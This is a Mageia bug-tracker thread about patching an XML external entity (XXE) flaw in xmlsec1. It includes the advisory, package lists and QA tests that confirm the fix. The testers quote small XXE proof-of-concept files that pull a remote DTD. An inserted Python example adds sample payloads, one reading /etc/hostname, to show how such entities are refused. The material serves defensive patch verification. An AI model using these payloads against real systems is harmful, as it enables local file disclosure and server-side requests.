Red Hat has issued an advisory today (August 21): https://access.redhat.com/errata/RHSA-2017:2492
Mageia 5 and Mageia 6 are also affected.
Whiteboard: (none) => MGA6TOO, MGA5TOO
Assigning to all packagers collectively, since there is no registered maintainer for this package.
Assignee: bugsquad => pkg-bugs
CC: (none) => marja11
CC: (none) => mageia
Version: Cauldron => 6
CVE: (none) => CVE-2017-1000061
Whiteboard: MGA6TOO, MGA5TOO => MGA5TOO
Pushed in updates_testing, src.rpm:
xmlsec1-1.2.24-1.mga5
xmlsec1-1.2.24-1.mga6
Assignee: pkg-bugs => qa-bugs
Advisory:
========================

Updated xmlsec1 packages fix security vulnerability:

It was discovered xmlsec1's use of libxml2 inadvertently enabled external entity expansion (XXE) along with validation. An attacker could craft an XML file that would cause xmlsec1 to try and read local files or HTTP/FTP URLs, leading to information disclosure or denial of service (CVE-2017-1000061).

References:
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-1000061
https://access.redhat.com/errata/RHSA-2017:2492
========================

Updated packages in core/updates_testing:
========================
xmlsec1-1.2.24-1.mga5
libxmlsec1_1-1.2.24-1.mga5
libxmlsec1-openssl1-1.2.24-1.mga5
libxmlsec1-nss1-1.2.24-1.mga5
libxmlsec1-gnutls1-1.2.24-1.mga5
libxmlsec1-gcrypt1-1.2.24-1.mga5
libxmlsec1-devel-1.2.24-1.mga5
xmlsec1-1.2.24-1.mga6
libxmlsec1_1-1.2.24-1.mga6
libxmlsec1-openssl1-1.2.24-1.mga6
libxmlsec1-nss1-1.2.24-1.mga6
libxmlsec1-gnutls1-1.2.24-1.mga6
libxmlsec1-gcrypt1-1.2.24-1.mga6
libxmlsec1-devel-1.2.24-1.mga6

from SRPMS:
xmlsec1-1.2.24-1.mga5.src.rpm
xmlsec1-1.2.24-1.mga6.src.rpm
Testing this on mga5::x86_64, later.
CC: (none) => tarazed25
mga5 x86_64

CVE-2017-1000061 PoC for XML External Entity attack.
https://github.com/lsh123/xmlsec/issues/43

Created file xinput.xml

    $ cat xinput.xml
    <?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [ <!ENTITY % remote SYSTEM "http://192.168.1.156/glabel.xml"> %remote;]>

Fake command:

    $ xmlsec1 --verify --output output.xml input.xml
    input.xml:1: I/O warning : failed to load HTTP resource
    TYPE root [ <!ENTITY % remote SYSTEM "http://192.168.1.156/glabel.xml"> %remote;
                                                                                   ^
    %remote;
            ^
    input.xml:2: parser error : Start tag expected, '<' not found

    ^
    Error: failed to parse xml file "input.xml"
    Error: failed to load document "input.xml"
    ERROR
    SignedInfo References (ok/all): 0/0
    Manifests References (ok/all): 0/0
    Error: failed to verify file "input.xml"

Updated from Core Updates testing:
- lib64xmlsec1-devel-1.2.24-1.mga5.x86_64
- lib64xmlsec1-gcrypt1-1.2.24-1.mga5.x86_64
- lib64xmlsec1-gnutls1-1.2.24-1.mga5.x86_64
- lib64xmlsec1-nss1-1.2.24-1.mga5.x86_64
- lib64xmlsec1-openssl1-1.2.24-1.mga5.x86_64
- lib64xmlsec1_1-1.2.24-1.mga5.x86_64
- xmlsec1-1.2.24-1.mga5.x86_64

    $ xmlsec1 --verify --output output.xml copy.xml
    func=xmlSecNoXxeExternalEntityLoader:file=xmlsec.c:line=53:obj=unknown:subj=xmlSecNoXxeExternalEntityLoader:error=5:libxml2 library function failed:illegal external entity='localhost:/glabel.xml'; xml error: 0: NULL
    copy.xml:2: parser error : Start tag expected, '<' not found

    ^
    func=xmlSecParseFile:file=parser.c:line=400:obj=unknown:subj=xmlParseDocument:error=5:libxml2 library function failed:filename=copy.xml; xml error: 4: Start tag expected, '<' not found
    Error: failed to parse xml file "copy.xml"
    Error: failed to load document "copy.xml"
    ERROR
    SignedInfo References (ok/all): 0/0
    Manifests References (ok/all): 0/0
    Error: failed to verify file "copy.xml"

That appears to have worked. The updated software refuses to entertain External Entities.
Continuing from comment 5.

xmlsec1 looks like a standalone and

    $ urpmq --whatrequires lib64xmlsec1_1
    lib64aqebics0
    lib64xmlsec1-devel
    lib64xmlsec1-gcrypt1
    lib64xmlsec1-gnutls1
    lib64xmlsec1-nss1
    lib64xmlsec1-openssl1
    lib64xmlsec1_1
    xmlsec1

shows that the library is required by other libraries. Giving this the OK based on a clean install and a positive PoC test.
Whiteboard: MGA5TOO => MGA5TOO MGA5-64-OK
mga6 x86_64

    <?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [ <!ENTITY % remote SYSTEM "http://192.168.1.3/evil.dtd"> %remote;]>

    $ xmlsec1 --verify --output output.xml input.xml
    error : Operation in progress
    input.xml:1: I/O warning : failed to load external entity "http://192.168.3.1/evil.dtd"
    !DOCTYPE root [ <!ENTITY % remote SYSTEM "http://192.168.3.1/evil.dtd"> %remote;
                                                                                   ^
    %remote;
            ^
    input.xml:3: parser error : Start tag expected, '<' not found

    ^
    Error: failed to parse xml file "input.xml"
    Error: failed to load document "input.xml"
    ERROR
    SignedInfo References (ok/all): 0/0
    Manifests References (ok/all): 0/0
    Error: failed to verify file "input.xml"

After updating the xml packages:

    $ xmlsec1 --verify --output output.xml input.xml
    func=xmlSecNoXxeExternalEntityLoader:file=xmlsec.c:line=53:obj=unknown:subj=xmlSecNoXxeExternalEntityLoader:error=5:libxml2 library function failed:illegal external entity='http://192.168.3.1/evil.dtd'; xml error: 0: NULL
    input.xml:3: parser error : Start tag expected, '<' not found

    ^
    func=xmlSecParseFile:file=parser.c:line=400:obj=unknown:subj=xmlParseDocument:error=5:libxml2 library function failed:filename=input.xml; xml error: 4: Start tag expected, '<' not found
    Error: failed to parse xml file "input.xml"
    Error: failed to load document "input.xml"
    ERROR
    SignedInfo References (ok/all): 0/0
    Manifests References (ok/all): 0/0
    Error: failed to verify file "input.xml"

This is good for 64-bits.
Whiteboard: MGA5TOO MGA5-64-OK => MGA5TOO MGA5-64-OK MGA6-64-OK
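The behaviour both testers observed after the update (xmlSecNoXxeExternalEntityLoader reporting the external DTD URL as an illegal external entity instead of fetching it) can be reproduced with a stock parser. The following is an added example, not code from xmlsec or from this bug report: it installs a refusing entity handler on Python's expat binding and runs it over constructed sample documents, one shaped like the PoC above (external parameter entity) plus an external general entity case and a clean document; the URLs in the samples are placeholders.

```python
import xml.parsers.expat as expat

# Constructed sample documents (placeholders, not from the bug report).
# PARAM_ENTITY_XXE has the shape of the PoC: a parameter entity that pulls in a
# remote DTD. GENERAL_ENTITY_XXE references a local file from element content.
PARAM_ENTITY_XXE = (
    b'<?xml version="1.0" encoding="UTF-8"?>'
    b'<!DOCTYPE root [ <!ENTITY % remote SYSTEM "http://example.invalid/remote.dtd"> %remote; ]>'
    b'<root/>'
)
GENERAL_ENTITY_XXE = (
    b'<?xml version="1.0" encoding="UTF-8"?>'
    b'<!DOCTYPE root [ <!ENTITY xxe SYSTEM "file:///etc/hostname"> ]>'
    b'<root>&xxe;</root>'
)
CLEAN = b'<?xml version="1.0" encoding="UTF-8"?><root><a>1</a></root>'


def parse_no_xxe(data: bytes) -> dict:
    """Parse `data` with every external entity reference refused.

    Same intent as xmlsec1 1.2.24's no-XXE loader: the parser learns which
    external entities the document wants but never loads them. Returns whether
    the parse succeeded, the root element, the refused system IDs and the error.
    """
    result = {"ok": False, "root": None, "refused": [], "error": None}
    parser = expat.ParserCreate()
    # Without this expat silently skips parameter entities and the handler below
    # would never see the DTD URL; with it every external reference is reported.
    parser.SetParamEntityParsing(expat.XML_PARAM_ENTITY_PARSING_ALWAYS)

    def on_start_element(name, attrs):
        if result["root"] is None:
            result["root"] = name

    def refuse_external_entity(context, base, system_id, public_id):
        # Record what the document tried to load and return 0, which makes expat
        # abort with XML_ERROR_EXTERNAL_ENTITY_HANDLING instead of fetching it.
        result["refused"].append(system_id)
        return 0

    parser.StartElementHandler = on_start_element
    parser.ExternalEntityRefHandler = refuse_external_entity
    try:
        parser.Parse(data, True)
        result["ok"] = True
    except expat.ExpatError as err:
        result["error"] = str(err)
    return result
```

A refused entry in `refused` is the signal to log: it is the same information the func=xmlSecNoXxeExternalEntityLoader line carries in the updated xmlsec1 output.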
Validating under temporary policy as we have 1 test per release.
Keywords: (none) => validated_update
Whiteboard: MGA5TOO MGA5-64-OK MGA6-64-OK => MGA5TOO MGA5-64-OK MGA6-64-OK advisory
CC: (none) => lewyssmith, sysadmin-bugs
An update for this issue has been pushed to the Mageia Updates repository. http://advisories.mageia.org/MGASA-2017-0305.html
Status: NEW => RESOLVED
Resolution: (none) => FIXED